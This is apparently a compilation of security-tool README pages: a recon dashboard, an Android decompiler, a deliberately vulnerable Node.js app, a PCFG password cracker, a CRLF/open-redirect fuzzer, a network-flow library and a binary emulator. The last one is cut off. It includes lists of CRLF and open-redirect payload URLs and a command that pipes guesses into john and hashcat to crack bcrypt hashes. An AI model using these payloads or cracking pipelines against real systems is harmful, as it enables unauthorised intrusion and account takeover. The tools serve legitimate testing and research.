Now head to http://localhost:5000, enter the credentials. They can be found in https://github.com/c0rvax/project-black/blob/master/config/config_docker.yml under application
For a more complex setup, or if something failed, see the wiki.

Resources notice
None of the docker containers restrict resource usage, so you are on your own here; however, you can change the number of parallel tasks for each worker separately. See the wiki for that.

How to work?
After setup, create a project and head to the respective page.


Now we will follow the basic steps which you can do within the application

Add scope
Let's say we are assessing hackerone.com and all its subdomains. Write hackerone.com into the add scope field and press Add to scope.


Entrypoint has been added.
There are other ways to add scope, see wiki

Quick note on working
All of the tasks can read parameters from the user; however, launching with some options won't display any new results, as it is pretty difficult to parse all possible outputs of a program. So to start, try duplicating the options from this manual.
Available options can be found on this page

Start amass
Click the blue button Launch task.


A popup with parameters will appear.


It is recommended to click the All_top_level_domains check box, enter -ip in argv, and click the Fire! button.


This would launch amass -d hackerone.com -ip. Note that in this case we did not specify any domain. This is because the All_top_level_domains check box means looking into the scope stored in the database. So the program sees that hackerone.com was added to the scope and launches amass against it.
Upon finishing, the new data is automatically added to scope.

Start masscan and nmap
Now head to IPs tab. Click the already known button Launch task and choose masscan.
We will launch a quick scan, using the button Top N ports. This autocompletes the argv parameter. Press Fire!


Results are automatically downloaded from the database.


Now click Launch task and choose nmap only open. This will find all the open ports which exist in the database and run nmap only against them.
Click Banner and Fire.


Detected banner will automatically appear


Launching dirsearch
Launch dirsearch against all IPs and all open ports (both HTTP and HTTPS will be tried).
On the IPs tab click Launch task and select dirsearch. Fill in the extensions you want to try and click Fire!
You can launch dirsearch against hosts (not IPs) on the Hosts tab.

Note on dirsearch
If there are no ports, dirsearch won't even start. So first, make sure you launched nmap or masscan to discover open ports.

Inspecting results
There are generally three ways to check the results:
  • IPs/Hosts list
  • IP/Host details
  • Dirsearch list

IPs and Hosts list
These are two tabs. They work the same way, so we will focus on Hosts.


You can see a list of hosts, their ports and files. You can also edit a comment for each host.
The important part here is the filtering box.


You can aggregate different filters using the field shown above. Type the filter you want (there is a helper for that) and press Shift + Enter


IP/Host details
You can also view details on a specific host or IP. Press the button with the glasses.


There you will see the dirsearch results for every open port on that host.

Dirsearch list
Dirsearch list button will open a new window showing all found files for every dirsearch which was launched in this project.

Launching tasks against specific scope
The Launch task buttons on the IPs and Hosts pages are different! The button on the IPs page will start a task against all IPs within the current project, while the button on the Hosts page will launch against hosts.
To launch a task against some hosts, you should
  1. Filter the hosts
  2. Launch the task
Example:


Some filters have been applied. If we now launch dirsearch, it will be launched against hosts which correspond to the used filters.


GDA Android Reversing Tool - A New Decompiler Written Entirely In C++, So It Does Not Rely On The Java Platform, Which Is Succinct, Portable And Fast, And Supports APK, DEX, ODEX, Oat

Here, a new Dalvik bytecode decompiler, GDA (this project started in 2013 and released its first version 1.0 in 2015 at www.gda.com:9090), is proposed and implemented in C++ to provide more sophisticated, fast and convenient decompilation support. GDA is completely self-contained and very stable. It supports APK, DEX, ODEX and OAT files, and runs without installation or Java VM support. GDA only takes up 2MB of disk space, and you can use it on any newly installed Windows system or virtual machine without additional configuration. In addition, GDA has more excellent features, as follows:


Interactive operation:
1. cross-references for strings, classes, methods and fields;
2. searching for strings, classes, methods and fields;
3. comments for Java code;
4. renaming of methods, fields and classes;
5. saving the analysis results in a GDA db file.
...

Utilities for Assisted Analysis:
1. extracting DEX from ODEX;
2. extracting DEX from OAT;
3. XML decoder;
4. algorithm tool;
5. device memory dump;
...

New features:
1. brand new Dalvik decompiler in C++ with friendly GUI;
2. Python script support;
3. packer recognition;
4. multi-DEX support;
5. making and loading method signatures;
6. malicious behavior scanning by API chains;
7. taint analysis to preview the behavior of variables;
8. taint analysis to trace the path of variables;
9. de-obfuscation;
10. API view with x-ref;
11. association of permissions with modules;
...
GDA shortcut key
Shortcut - Description
F5 - Switch java to smali; pressing it again goes back to java
F - Trace the args and return value by dataflow analysis
X - Cross-referencing, locating callers (of strings, classes, methods, fields, Smali, Java)
Esc/<-/Backspace - Back to the last visit
-> - Forward to the next visit
G - Jump to an offset you input
N - Rename the variable/method/class name
S - Search for all the elements matching the given string
C - Comments; only supported for Java code
DoubleClick - With the cursor placed at a method/str/field/class, double-click to access the object
M - With the cursor placed at a Smali line, press 'M' to edit the instruction
Up - Press the 'up' key to access the previous method in the tree control
Down - Press the 'down' key to access the next method in the tree control
D - Dump the binary data of methods; only supported in the Smali window
Enter - Modifications in edit boxes take effect
H - Show data in hex
Ctrl+H - Pop up the search history window
Ctrl+A - Select all
Ctrl+C - Copy
Ctrl+V - Paste, only for editable boxes
Ctrl+X - Cut
Ctrl+F - Find a string in the current window
Ctrl+S - Save the modifications into the GDA database file

Installing
No installation needed - just double-click the binary and enjoy it.

Supported platforms
Only for windows

Usage:
Brief guide: https://github.com/charles2gan/GDA-android-reversing-Tool/wiki
Python scripts: https://github.com/charles2gan/GDA-android-reversing-Tool/wiki/GDA-Python-scripts

Shows:
File loading and decompiling:



MalScan, API search, x-ref...


URL, XML, string x-ref...


variable trace



DVNA - Damn Vulnerable NodeJS Application


Damn Vulnerable NodeJS Application (DVNA) is a simple NodeJS application that demonstrates the OWASP Top 10 vulnerabilities and provides guidance on fixing and avoiding them. The fixes branch contains fixes for the vulnerabilities. Fixes for OWASP Top 10 2017 vulnerabilities are in the fixes-2017 branch.
The application is powered by commonly used libraries such as express, passport, sequelize, etc.

Developer Security Guide book
The application comes with a developer friendly comprehensive guidebook which can be used to learn, avoid and fix the vulnerabilities. The guide available at https://appsecco.com/books/dvna-developers-security-guide/ covers the following
  1. Instructions for setting up DVNA
  2. Instructions on exploiting the vulnerabilities
  3. Vulnerable code snippets and instructions on fixing vulnerabilities
  4. Recommendations for avoiding such vulnerabilities
  5. References for learning more
The blog post for this release is at https://blog.appsecco.com/damn-vulnerable-nodejs-application-dvna-by-appsecco-7d782d36dc1e

Quick start
Try DVNA using a single command with Docker. This setup uses an SQLite database instead of MySQL.
docker run --name dvna -p 9090:9090 -d appsecco/dvna:sqlite
Access the application at http://127.0.0.1:9090/

Getting Started
DVNA can be deployed in three ways
  1. For Developers, using docker-compose with auto-reload on code updates
  2. For Security Testers, using the Official image from Docker Hub
  3. For Advanced Users, using a fully manual setup
Detailed instructions on setup and requirements are given in the Guide Gitbook

Development Setup
Clone this repository
git clone https://github.com/appsecco/dvna; cd dvna
Create a vars.env with the desired database configuration
MYSQL_USER=dvna
MYSQL_DATABASE=dvna
MYSQL_PASSWORD=passw0rd
MYSQL_RANDOM_ROOT_PASSWORD=yes
Start the application and database using docker-compose
docker-compose up
Access the application at http://127.0.0.1:9090/
The application will automatically reload on code changes, so feel free to patch and play around with the application.

Using Official Docker Image
Create a file named vars.env with the following configuration
MYSQL_USER=dvna
MYSQL_DATABASE=dvna
MYSQL_PASSWORD=passw0rd
MYSQL_RANDOM_ROOT_PASSWORD=yes
MYSQL_HOST=mysql-db
MYSQL_PORT=3306
Start a MySQL container
docker run --name dvna-mysql --env-file vars.env -d mysql:5.7
Start the application using the official image
docker run --name dvna-app --env-file vars.env --link dvna-mysql:mysql-db -p 9090:9090 appsecco/dvna
Access the application at http://127.0.0.1:9090/ and start testing!

Manual Setup
Clone the repository
git clone https://github.com/appsecco/dvna; cd dvna
Configure the environment variables with your database information
export MYSQL_USER=dvna
export MYSQL_DATABASE=dvna
export MYSQL_PASSWORD=passw0rd
export MYSQL_HOST=127.0.0.1
export MYSQL_PORT=3306
Install Dependencies
npm install
Start the application
npm start
Access the application at http://localhost:9090

TODO
  • Link commits to fixes in documentation
  • Add new vulnerabilities from OWASP Top 10 2017
  • Improve application features, documentation

Thanks
Abhisek Datta - abhisek for application architecture and front-end code


PCFG Cracker - Probabilistic Context Free Grammar (PCFG) Password Guess Generator


PCFG = Probabilistic Context Free Grammar
PCFG = Pretty Cool Fuzzy Guesser
In short: a collection of tools to perform research into how humans generate passwords. These can be used to crack password hashes, but also to create synthetic passwords (honeywords) or to help develop better password strength algorithms.

Documentation

Academic Papers:
Original 2009 IEEE Security and Privacy paper on PCFGs for password cracking: https://ieeexplore.ieee.org/abstract/document/5207658
My 2010 dissertation which describes several advanced features such as the updated "next" algorithm: https://diginole.lib.fsu.edu/islandora/object/fsu%3A175769
Comparative Analysis of Three Language Spheres: Are Linguistic and Cultural Differences Reflected in Password Selection Habits? Authors: Keika Mori, Takuya Watanabe, Yunao Zhou, Ayako Akiyama Hasegawa, Mitsuaki Akiyama and Tatsuya Mori: https://nsl.cs.waseda.ac.jp/wp-content/uploads/2019/07/EuroUSEC19-mori.pdf

Wiki
Since it does not require pushing new versions to update it, the wiki is a source of random notes about this project: https://github.com/lakiw/pcfg_cracker/wiki

Documents Folder
Several documents can also be found in the Documents folder of this repository.
  • pcfg_next_function_overview.pptx: A slide deck talking about the PCFG next function. The intended audience for this is developers and academic researchers.

Overview
This project uses machine learning to identify the password creation habits of users. A PCFG model is generated by training on a list of disclosed plaintext/cracked passwords. In the context of this project, the model is referred to as a ruleset and contains many different parts of the passwords identified during training, along with their associated probabilities. This stemming can be useful for other cracking tools such as PRINCE, and/or parts of the ruleset can be directly incorporated into more traditional dictionary-based attacks. This project also includes a PCFG guess generator that makes use of this ruleset to generate password guesses in probability order. This is much more powerful than standard dictionary attacks, and in testing has proven able to crack passwords on average with significantly fewer guesses than other publicly available methods. The downside is that generating guesses in probability order is slow: it creates on average 50-100k guesses a second, whereas GPU-based algorithms can create millions to billions (and up) of guesses a second against fast hashing algorithms. Therefore, the PCFG guesser is best used against large numbers of salted hashes, or other slow hashing algorithms, where the performance cost of the algorithm is made up for by the accuracy of the guesses.

Requirements + Installation
  • Python3 is the only hard requirement for these tools
  • It is highly recommended that you install the chardet python3 library for training. While not required, it performs character encoding autodetection of the training passwords. To install it:
  • Download the source from https://pypi.python.org/pypi/chardet
  • Or install it using pip3 install chardet

Quick Start Guide

Training
The default ruleset included in this repo was created by training on a 1 million password subset of the RockYou dataset. Better performance can be achieved by training on the full 32 million password set for RockYou, but that was excluded to keep the download size small. You can use the default ruleset to start generating passwords without having to train on a new list, but it is recommended to train on a target set of passwords that may be closer to what you are trying to target. If you do create your own ruleset, here is a quick guide:
  1. Identify a set of plaintext passwords to train on.
  • This password set should include duplicate passwords. That way the trainer can identify that passwords like 123456 are common.
  • The passwords should be in plaintext with hashes and associated info like usernames removed from them. Don't try to use raw .pot files as your training set as the hashes will be considered part of the password by the training program.
  • The passwords should be encoded the same way you want to generate password guesses. So, if you want to create UTF-8 password guesses, the training set should also be encoded as UTF-8. Long term, the ability to modify this when generating guesses is on the development plan, but that feature is currently not supported.
  • The training password list should be between 100k and 50 million. Testing is still being done on how the size of the training password list affects guess generation, and there has been good success even with password lists as small as 10k, but an ideal size is likely around 1 million, with diminishing returns after that.
  • For the purposes of this tutorial the input password list will be referred to as INPUT_PASSWORD_LIST
  2. Choose a name for your generated ruleset. For the purposes of this tutorial it will be NEW_RULESET
  3. Run the trainer on the input password list
  • python3 trainer.py -t INPUT_PASSWORD_LIST -r NEW_RULESET
  • Common optional flags:
    a. coverage: How much you trust the training set to match the target passwords. A higher coverage means less intelligent brute-force generation using Markov modeling (currently the OMEN algorithm). If you set coverage to 1, no brute force will be performed. If you set coverage to 0, it will only generate guesses using Markov attacks. This value is a float, with the default being 0.6, which means it expects a 60% chance that the target password's base words can be found in the training set. Example: python3 trainer.py -t INPUT_PASSWORD_LIST -r NEW_RULESET -c 0.6
    b. --save_sensitive: If this is specified, sensitive data such as e-mail addresses and full websites discovered during training will be saved in the ruleset. While the PCFG guess generator does not currently make use of this data, it is very valuable during a real password cracking attack. This is off by default to make the tool easier to use in an academic setting. Note, even when this is off, there will almost certainly still be PII data saved inside a ruleset, so protect generated rulesets appropriately. Example: python3 trainer.py -t INPUT_PASSWORD_LIST -r NEW_RULESET --save_sensitive
    c. --comments: Adds a comment to your ruleset config file. This is useful so you know why and how you generated your ruleset when looking back at it later. Include the comment you want to add in quotes.

Guess Generation
This generates guesses to stdout using a previously trained PCFG ruleset. These guesses can then be piped into any program that you want to make use of them. If no ruleset is specified, the default ruleset DEFAULT will be used. For the purposes of this guide it will be assumed the ruleset being used is NEW_RULESET.
  1. Note: the guess generation program is case sensitive when specifying the ruleset name.
  • A session name is not required (by default a session called default_run is created), but it is helpful for making it easier to restart a paused/stopped session. These examples will use the session name SESSION_NAME. Note, there is no built-in sanity check if you run multiple sessions with the same name at the same time, but it is recommended to avoid that.
  2. To start a new guessing session run:
  • python3 pcfg_guesser.py -r NEW_RULESET -s SESSION_NAME
  3. To restart a previous guessing session run:
  • python3 pcfg_guesser.py -s SESSION_NAME --load

Password Strength Scoring
There are many cases where you may want to estimate the probability of a password being generated by a previously trained ruleset. For example, this could be part of a password strength metric, or used for other research purposes. A sample program has been included to perform this.
  • INPUT_LIST represents the list of passwords to score. These passwords should be plaintext, and separated by newlines, with one password per line.
  1. To run a scoring session: python3 password_scorer -r NEW_RULESET -i INPUT_LIST
  2. By default, it will output the results to stdout, with each password scored per line
  • The first value is the raw password
  • The second value represents whether the input value was scored as a 'password', 'website', 'e-mail address', or 'other'. This determination of password or other depends on the limits you set for both the OMEN guess limit and the probability associated with the PCFG.
  • The third value is the probability of the password according to the Ruleset. If it is assigned a value of 0.0, that means that the password will not be generated by the ruleset, though it may be generated by a Markov based attack
  • The fourth value is the OMEN level that will generate the password. A value of -1 means the password will not be generated by OMEN.

Prince-Ling Wordlist Generator
Name: PRINCE Language Indexed N-Grams (Prince-Ling)
Overview: Constructs customized wordlists based on an already trained PCFG ruleset/grammar for use in PRINCE-style combinator attacks. The idea behind this is that since the PCFG trainer is already breaking a training set of passwords up into individual parsings, that information can be leveraged to make targeted wordlists for other attacks.
Basic Mechanics: Under the hood, the Prince-Ling tool is basically a mini PCFG guess generator. It strips out the Markov guess generation and replaces the base structures used in normal PCFG attacks with a significantly reduced base structure tailored to generating PRINCE wordlists. This allows generating dictionary words in probability order with an eye to how useful those words are expected to be in a PRINCE attack.
Using Prince-Ling
  1. Train a PCFG ruleset using trainer.py. Note you need to create the ruleset using version 4.1 or later of the PCFG toolset, as earlier versions did not learn all the data structures that Prince-Ling utilizes.
  2. Run Prince-Ling python3 prince-ling.py -r RULESET_NAME -s SIZE_OF_WORDLIST_TO_CREATE -o OUTPUT_FILENAME
  • --rule: Name of the PCFG ruleset to create the PRINCE wordlist from
  • --size: Number of words to create for the PRINCE wordlist. Note, if not specified, Prince-Ling will generate all possible words, which can be quite a lot depending on whether case mangling is enabled. (Case mangling increases the keyspace enormously.)
  • --output: Output filename to write entries to. Note, if not specified, Prince-Ling will output words to stdout, which may cause problems depending on what shell you are using when printing non-ASCII characters.
  • --all_lower: Only generate lowercase words for the PRINCE dictionary. This is useful when attacking case-insensitive hashes, or if you plan on applying targeted case mangling a different way.

Example Cracking Passwords Using John the Ripper
python3 pcfg_guesser.py -r NEW_RULESET -s SESSION_NAME | ./john --stdin --format=bcrypt PASSWORDS_TO_CRACK.txt
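The same pipe works with any cracker that accepts candidates on stdin. For example, a roughly equivalent hashcat invocation might look like the line below (hashcat reads candidates from stdin when no wordlist is supplied; -m 3200 is bcrypt):
python3 pcfg_guesser.py -r NEW_RULESET -s SESSION_NAME | hashcat -m 3200 PASSWORDS_TO_CRACK.txt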

Contributing
If you notice any bugs, or if you have a feature you would like to see added, please open an issue on this GitHub page. I also accept pull requests, though ideally please link a pull request to an issue so that I can more easily review it, ask questions, and better understand the changes you are making.
There are a lot of improvements that can be made to modeling password creation strategies using PCFGs. I'm very open to new ideas, changes, and suggestions. Just because the code currently does something a certain way doesn't mean that's the best option. For example, the fundamental base_structure of the current approach, where masks are generated for alpha strings, digits, other, etc., was chosen because it was the "easiest" option to implement. My team had a lot of debate that a better option might be to start with a base word, and then model more traditional mangling rules applied to it as transitions in the PCFG. So feel free to go wild with this code!


Injectus - CRLF And Open Redirect Fuzzer


Simple python tool that goes through a list of URLs trying CRLF and open redirect payloads.

▪ ▐ ▄ ▐▄▄▄▄▄▄ . ▄▄· ▄▄▄▄▄▄• ▄▌.▄▄ ·
██ •█▌▐█ ·██▀▄.▀·▐█ ▌▪•██ █▪██▌▐█ ▀.
▐█·▐█▐▐▌▪▄ ██▐▀▀▪▄██ ▄▄ ▐█.▪█▌▐█▌▄▀▀▀█▄
▐█▌██▐█▌▐▌▐█▌▐█▄▄▌▐███▌ ▐█▌·▐█▄█▌▐█▄▪▐█
▀▀▀▀ ██▪ ▀▀▀• ▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀ ▀▀▀▀
~ BOUNTYSTRIKE ~

usage: Injectus [-h] [-f FILE] [-u URL] [-r] [-w WORKERS] [-t TIMEOUT]
                [-d DELAY] [-c] [-op]

CRLF and open redirect fuzzer. Crafted by @dubs3c.

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing URLs
  -u URL, --url URL     Single URL to test
  -r, --no-request      Only build attack list, do not perform any requests
  -w WORKERS, --workers WORKERS
                        Amount of asyncio workers, default is 10
  -t TIMEOUT, --timeout TIMEOUT
                        HTTP request timeout, default is 6 seconds
  -d DELAY, --delay DELAY
                        The delay between requests, default is 1 second
  -c, --crlf            Only perform crlf attacks
  -op, --openredirect   Only perform open redirect attacks

Motivation
Needed a simple CRLF/open redirect scanner that I could include into my bug bounty pipeline at https://github.com/BountyStrike/Bountystrike-sh. Didn't find any tools that satisfied my need, so I created Injectus. It's a little bit of an experiment, to see if it works better than other tools.

Design
If we have the following URL:
https://dubell.io/?param1=value1&url=value2&param3=value3
For CRLF attacks, Injectus will inject every payload into the value of one parameter at a time, for each of the n parameters (a sketch of this logic is shown after the examples below). For example, Injectus will create the following list for the URL above:
https://dubell.io/?param1=%%0a0abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%0abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%0d%0abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%0dbounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%23%0dbounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%25%30%61bounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%25%30abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%250abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%25250abounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%3f%0dbounty:strike&url=value2&param3=value3
https://dubell.io/?param1=%u000abounty:strike&url=value2&param3=value3

https://dubell.io/?param1=value1&url=%%0a0abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%0abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%0d%0abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%0dbounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%23%0dbounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%25%30%61bounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%25%30abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%250abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%25250abounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%3f%0dbounty:strike&param3=value3
https://dubell.io/?param1=value1&url=%u000abounty:strike&param3=value3

https://dubell.io/?param1=value1&url=value2&param3=%%0a0abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%0abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%0d%0abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%0dbounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%23%0dbounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%25%30%61bounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%25%30abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%250abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%25250abounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%3f%0dbounty:strike
https://dubell.io/?param1=value1&url=value2&param3=%u000abounty:strike
As you can see, every CRLF payload is injected in the first parameter's value. Once the loop is done, Injectus will inject every payload into the second parameter, and so on. Once all parameters have been injected, the list is complete.
If there are no query parameters, Injectus will simply append each payload to the URL, like so:
https://dubell.io/some/path/%%0a0abounty:strike
https://dubell.io/some/path/%0abounty:strike
https://dubell.io/some/path/%0d%0abounty:strike
https://dubell.io/some/path/%0dbounty:strike
https://dubell.io/some/path/%23%0dbounty:strike
https://dubell.io/some/path/%25%30%61bounty:strike
https://dubell.io/some/path/%25%30abounty:strike
https://dubell.io/some/path/%250abounty:strike
https://dubell.io/some/path/%25250abounty:strike
https://dubell.io/some/path/%3f%0dbounty:strike
https://dubell.io/some/path/%u000abounty:strike
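The per-parameter substitution described above can be sketched in a few lines of Python (illustrative only, not Injectus' actual implementation; the payload list is abbreviated):
from urllib.parse import urlsplit, parse_qsl

PAYLOADS = ["%0d%0abounty:strike", "%0abounty:strike"]  # abbreviated; Injectus ships a longer list

def build_crlf_urls(url):
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    base = f"{parts.scheme}://{parts.netloc}{parts.path}"
    if not params:
        # No query string: append each payload to the path instead
        return [base.rstrip("/") + "/" + p for p in PAYLOADS]
    urls = []
    for i in range(len(params)):
        for payload in PAYLOADS:
            # Rebuild the query by hand: the payloads are already URL-encoded,
            # so urlencode() would double-encode them
            qs = "&".join(
                f"{k}={payload if j == i else v}" for j, (k, v) in enumerate(params)
            )
            urls.append(f"{base}?{qs}")
    return urls

for u in build_crlf_urls("https://dubell.io/?param1=value1&url=value2&param3=value3"):
    print(u)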
When injecting open redirect payloads, Injectus will only inject a payload if there exists a query/path parameter containing a typical redirect keyword, e.g. url. Injecting into the following URL https://dubell.io/?param1=value1&url=dashboard&param3=value3:
https://dubell.io/?param1=value1&url=$2f%2fbountystrike.io%2f%2f&param3=value3
https://dubell.io/?param1=value1&url=%2f$2fbountystrike.io&param3=value3
https://dubell.io/?param1=value1&url=%2fbountystrike.io%2f%2f&param3=value3
https://dubell.io/?param1=value1&url=%2fbountystrike.io//&param3=value3
https://dubell.io/?param1=value1&url=%2fbountystrike.io&param3=value3
https://dubell.io/?param1=value1&url=////bountystrike.io&param3=value3
https://dubell.io/?param1=value1&url=///bountystrike.io&param3=value3
https://dubell.io/?param1=value1&url=//bountystrike.io&param3=value3
https://dubell.io/?param1=value1&url=/\bountystrike.io&param3=value3
https://dubell.io/?param1=value1&url=/bountystrike.io&param3=value3
https://dubell.io/?param1=value1&url=/http://bountystrike.io&param3=value3
https://dubell.io/?param1=value1&url=bountystrike.io&param3=value3
The URL contains the query parameter url, so Injectus will inject the payloads into that parameter.
An example when using path parameters. Original URL is https://dubell.io/some/path/that/redirect/dashboard:
https://dubell.io/some/path/that/redirect/$2f%2fbountystrike.io%2f%2f
https://dubell.io/some/path/that/redirect/%2f$2fbountystrike.io
https://dubell.io/some/path/that/redirect/%2fbountystrike.io%2f%2f
https://dubell.io/some/path/that/redirect/%2fbountystrike.io
https://dubell.io/some/path/that/redirect/%2fbountystrike.io//
https://dubell.io/some/path/that/redirect/////bountystrike.io
https://dubell.io/some/path/that/redirect////bountystrike.io
https://dubell.io/some/path/that/redirect///bountystrike.io
https://dubell.io/some/path/that/redirect//\bountystrike.io
https://dubell.io/some/path/that/redirect//bountystrike.io
https://dubell.io/some/path/that/redirect//http://bountystrike.io
https://dubell.io/some/path/that/redirect/bountystrike.io
As before, if no query parameters or path parameters are found, Injectus will simply append each payload to the URL:
https://dubell.io/$2f%2fbountystrike.io%2f%2f
https://dubell.io/%2f$2fbountystrike.io
https://dubell.io/%2fbountystrike.io%2f%2f
https://dubell.io/%2fbountystrike.io
https://dubell.io/%2fbountystrike.io//
https://dubell.io/////bountystrike.io
https://dubell.io////bountystrike.io
https://dubell.io///bountystrike.io
https://dubell.io//\\bountystrike.io
https://dubell.io//bountystrike.io
https://dubell.io//http://bountystrike.io
https://dubell.io/bountystrike.io
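The keyword check that decides whether a URL receives open redirect payloads can be sketched like this (illustrative; the keyword list below is an assumption and Injectus' actual list may differ):
from urllib.parse import urlsplit, parse_qsl

REDIRECT_KEYWORDS = {"url", "redirect", "next", "return", "dest", "goto"}  # assumed list

def redirect_targets(url):
    parts = urlsplit(url)
    # Query parameters whose name looks like a redirect parameter
    query_hits = [k for k, _ in parse_qsl(parts.query) if k.lower() in REDIRECT_KEYWORDS]
    # Path segments that match a redirect keyword (e.g. /redirect/dashboard)
    path_hits = [seg for seg in parts.path.split("/") if seg.lower() in REDIRECT_KEYWORDS]
    return query_hits, path_hits

print(redirect_targets("https://dubell.io/?param1=value1&url=dashboard&param3=value3"))
# -> (['url'], [])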

Installation
pip3.7 install -r requirements.txt --user


WhatTheHack - A Collection Of Challenge Based Hack-A-Thons Including Student Guide, Proctor Guide, Lecture Presentations, Sample/Instructional Code And Templates


WhatTheHack is a collection of challenge based hack-a-thons including student guide, proctor guide, lecture presentations, sample/instructional code and templates.

What, Why and How
  • "What the Hack" is a challenge based hackathon format
  • Challenges describe high-level tasks and goals to be accomplished
  • Challenges are not step-by-step labs
  • Attendees work in teams of 3 to 5 people to solve the challenges
  • Attendees "learn from" and "share with" each other
  • By having to "figure it out", attendee knowledge retention is greater
  • Proctors provide guidance, but not answers to the teams
  • Emcees provide lectures & demos to setup challenges & review solutions
  • What the Hack can be hosted in-person or virtually via MS Teams

How to Add Your Hack
We welcome all new hacks! The process for doing this is:
  • Fork this repo into your own github account
  • Create a new branch for your work
  • Add a new top level folder using the next number in sequence, eg:
    • 011-BigNewHack
  • Within this folder, create two folders, each with two folders within, so that the layout looks like this (a one-line command for this is shown after the list):
    • Host
      • Guides
      • Solutions
    • Student
      • Guides
      • Resources
  • The content of each folder should be:
    • Student/Guides: The Student's Guide
    • Student/Resources: Any template or "starter" files that students may need in challenges
    • Host/Guides: The Proctor's Guide lives here as well as any Lecture slide decks
    • Host/Solutions: Specific files that the proctors might need that have solutions in them.
  • Once your branch and repo have all your content and it is formatted correctly, follow the instructions on this page to submit a pull request back to the main repository:
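As referenced above, the whole folder layout can be created in one shell command (011-BigNewHack being the example name):
mkdir -p 011-BigNewHack/{Host/{Guides,Solutions},Student/{Guides,Resources}}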


Nfstream - A Flexible Network Data Analysis Framework


nfstream is a Python package providing fast, flexible, and expressive data structures designed to make working with online or offline network data both easy and intuitive. It aims to be the fundamental high-level building block for doing practical, real world network data analysis in Python. Additionally, it has the broader goal of becoming a common network data processing framework for researchers providing data reproducibility across experiments.

Main Features
  • Performance: nfstream is designed to be fast (x10 faster with pypy3 support) with a small CPU and memory footprint.
  • Layer-7 visibility: nfstream's deep packet inspection engine is based on nDPI. It allows nfstream to perform reliable encrypted application identification and metadata extraction (e.g. TLS, QUIC, TOR, HTTP, SSH, DNS).
  • Flexibility: add a flow feature in 2 lines as an NFPlugin.
  • Machine Learning oriented: add your trained model as an NFPlugin.

How to use it?
  • Dealing with a big pcap file and just want to aggregate it as network flows? nfstream makes this easier in a few lines:
from nfstream import NFStreamer

my_awesome_streamer = NFStreamer(source="facebook.pcap")  # or a network interface (source="eth0")
for flow in my_awesome_streamer:
    print(flow)  # print it, append to a pandas DataFrame or whatever you want :)!
NFEntry(
    id=0,
    first_seen=1472393122365,
    last_seen=1472393123665,
    version=4,
    src_port=52066,
    dst_port=443,
    protocol=6,
    vlan_id=0,
    src_ip='192.168.43.18',
    dst_ip='66.220.156.68',
    total_packets=19,
    total_bytes=5745,
    duration=1300,
    src2dst_packets=9,
    src2dst_bytes=1345,
    dst2src_packets=10,
    dst2src_bytes=4400,
    expiration_id=0,
    master_protocol=91,
    app_protocol=119,
    application_name='TLS.Facebook',
    category_name='SocialNetwork',
    client_info='facebook.com',
    server_info='*.facebook.com',
    j3a_client='bfcc1a3891601edb4f137ab7ab25b840',
    j3a_server='2d1eb5817ece335c24904f516ad5da12'
)
  • From pcap to Pandas DataFrame?
import pandas as pd

streamer_awesome = NFStreamer(source='devil.pcap')
data = []
for flow in streamer_awesome:
    data.append(flow.to_namedtuple())
my_df = pd.DataFrame(data=data)
my_df.head(5)  # Enjoy!
  • Didn't find a specific flow feature? Add a plugin to nfstream in a few lines:
from nfstream import NFPlugin

class my_awesome_plugin(NFPlugin):
    def on_update(self, obs, entry):
        if obs.length >= 666:
            entry.my_awesome_plugin += 1

streamer_awesome = NFStreamer(source='devil.pcap', plugins=[my_awesome_plugin()])
for flow in streamer_awesome:
    print(flow.my_awesome_plugin)  # see your dynamically created metric in generated flows
  • More examples and details are provided in the official documentation.

Prerequisites
    apt-get install libpcap-dev

Installation

Using pip
Binary installers for the latest released version are available:
    pip3 install nfstream

Build from source
If you want to build nfstream on your local machine:
    git clone https://github.com/aouinizied/nfstream.git
cd nfstream
python3 setup.py install

Contributing
Please read Contributing for details on our code of conduct, and the process for submitting pull requests to us.

Authors
Zied Aouini created nfstream and these fine people have contributed.

Ethics
nfstream is intended for network data research and forensics. Researchers and network data scientists can use this framework to build reliable datasets, and to train and evaluate network applied machine learning models. As with any packet monitoring tool, nfstream could potentially be misused. Do not run it on any network of which you are not the owner or the administrator.



Qiling - Advanced Binary Emulation Framework


Qiling is an advanced binary emulation framework, with the following features:
  • Cross platform: Windows, MacOS, Linux, BSD
  • Cross architecture: X86, X86_64, Arm, Arm64, Mips
  • Multiple file formats: PE, MachO, ELF
  • Emulate & sandbox machine code in an isolated environment
  • Provide high level API to setup & configure the sandbox
  • Fine-grain instrumentation: allow hooks at various levels (instruction/basic-block/memory-access/exception/syscall/IO/etc)
  • Allow dynamic hotpatching of running code on the fly, including the loaded library
  • True framework in Python, making it easy to build customized security analysis tools on top
Qiling is backed by Unicorn engine.
Visit website https://www.qiling.io for more information.

Qiling vs other Emulators
There are many open source emulators, but the two projects closest to Qiling are Unicorn & Qemu usermode. This section explains the main differences between Qiling and them.

Qiling vs Unicorn engine
Built on top of Unicorn, but Qiling & Unicorn are two different animals.
